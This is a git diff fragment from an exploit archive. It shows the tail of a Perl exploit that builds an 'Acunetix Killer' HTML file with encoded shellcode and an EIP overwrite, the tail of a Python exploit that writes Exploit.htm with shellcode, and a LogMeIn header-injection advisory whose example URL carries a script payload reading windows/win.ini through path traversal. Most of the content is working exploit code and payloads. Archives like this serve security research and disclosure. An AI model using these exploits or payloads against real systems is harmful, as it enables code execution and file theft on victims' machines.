-"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
-"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
-"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
-"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
-"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
-"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
-"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";
-
-my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
-my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
-my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
-my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
-my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
-
-my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
-open($FILE,">$file");
-print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
-close($FILE);
-print "Acunetix Killer File Created successfully\n";
+shellcode += "\">"
+tail = ("<img src=\"http://i.imgur.com/BimAoR0.jpg\">\
+		</body>\
+		</html>")
+exploit = head + junk + edx + junk2 + eip + shellcode + tail
+filename = "Exploit.htm"
+file = open(filename, "w")
+file.write(exploit)
+file.close()
+print "[~] " + str(len(exploit)) + " Bytes written to file"  
+#EOF
\ No newline at end of file
diff --git a/platforms/windows/remote/33025.txt b/platforms/windows/remote/33025.txt
new file mode 100755
index 000000000..64a8776ab
--- /dev/null
+++ b/platforms/windows/remote/33025.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35236/info
+
+LogMeIn is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input.
+
+By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling.
+
+LogMeIn 4.0.784 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/#viewSource
+http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21-- 
\ No newline at end of file